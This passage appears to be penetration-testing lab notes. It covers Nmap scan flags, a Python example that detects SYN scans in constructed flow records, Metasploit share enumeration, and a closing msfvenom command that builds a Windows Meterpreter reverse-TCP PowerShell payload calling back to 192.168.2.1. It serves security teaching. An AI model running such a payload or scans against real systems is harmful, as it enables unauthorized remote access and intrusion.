Hands-on 1
Use Nmap to identify live machines in the local network. Enumerate open TCP ports on them and the operating system in use.
Nmap has many useful flags for this task:
-sT for a full-connect TCP scan (completes the three-way handshake)
-sS for a half-open (SYN) TCP scan (tears the connection down before the handshake completes)
-sU for a UDP scan
-sV for service and version detection
-O for operating system detection
-sC to run the default NSE script set, which checks for common vulnerabilities and misconfigurations.
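The difference between -sT and -sS above is visible on the wire: a full-connect scan finishes the handshake with an ACK, a SYN scan answers the SYN/ACK with a RST. The following is an added example, not part of the original lab, that classifies constructed connection records this way and flags a client that probes several ports on a host; the record format and the threshold of three ports are assumptions for illustration.

```python
from collections import defaultdict

# Constructed sample flow log (not captured from a real network).
# Record: (client, server, server_port, direction, tcp_flags);
# "->" is client to server, "<-" is server to client.
SAMPLE_EVENTS = [
    ("10.0.0.5", "10.0.0.20", 22,  "->", "S"),   # SYN-scan style probes
    ("10.0.0.5", "10.0.0.20", 22,  "<-", "SA"),
    ("10.0.0.5", "10.0.0.20", 22,  "->", "R"),   # RST instead of ACK: half-open
    ("10.0.0.5", "10.0.0.20", 80,  "->", "S"),
    ("10.0.0.5", "10.0.0.20", 80,  "<-", "SA"),
    ("10.0.0.5", "10.0.0.20", 80,  "->", "R"),
    ("10.0.0.5", "10.0.0.20", 443, "->", "S"),
    ("10.0.0.5", "10.0.0.20", 443, "<-", "RA"),  # closed port answers RST/ACK
    ("10.0.0.7", "10.0.0.20", 443, "->", "S"),   # ordinary full connection
    ("10.0.0.7", "10.0.0.20", 443, "<-", "SA"),
    ("10.0.0.7", "10.0.0.20", 443, "->", "A"),   # handshake completed
    ("10.0.0.7", "10.0.0.20", 443, "->", "FA"),
]

def classify_probes(events):
    """Map (client, server, port) -> 'open-full', 'open-half', 'closed' or 'incomplete'."""
    flows = defaultdict(list)
    for client, server, port, direction, flags in events:
        flows[(client, server, port)].append((direction, flags))
    verdicts = {}
    for key, seq in flows.items():
        verdict, synack_seen = "incomplete", False
        for direction, flags in seq:
            if direction == "<-" and "R" in flags and not synack_seen:
                verdict = "closed"            # server refused the SYN outright
                break
            if direction == "<-" and "S" in flags and "A" in flags:
                synack_seen = True            # port is open; watch the client's reply
                continue
            if synack_seen and direction == "->":
                verdict = "open-half" if "R" in flags else "open-full"
                break
        verdicts[key] = verdict
    return verdicts

def summarize_clients(verdicts, port_threshold=3):
    """Per client: distinct ports touched, half-open/closed counts, scan suspicion."""
    stats = defaultdict(lambda: {"ports": set(), "half_open": 0, "closed": 0})
    for (client, server, port), verdict in verdicts.items():
        stats[client]["ports"].add((server, port))
        if verdict == "open-half":
            stats[client]["half_open"] += 1
        elif verdict == "closed":
            stats[client]["closed"] += 1
    return {c: {"ports_probed": len(s["ports"]), "half_open": s["half_open"],
                "closed": s["closed"],
                "scan_suspected": len(s["ports"]) >= port_threshold
                and (s["half_open"] + s["closed"]) > 0}
            for c, s in stats.items()}
```

On the sample, 10.0.0.5 is reported with three ports probed, two half-open connections and one closed port, while 10.0.0.7 shows a single completed connection and is not flagged.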
Use Metasploit to enumerate open shares on any of the live machines in the local network.
show auxiliary
show exploits
show payloads
Check if we have write permissions on any share.
Generate Payload
msfvenom -p windows/x64/meterpreter_reverse_tcp -f psh LHOST=192.168.2.1 -o payload.ps1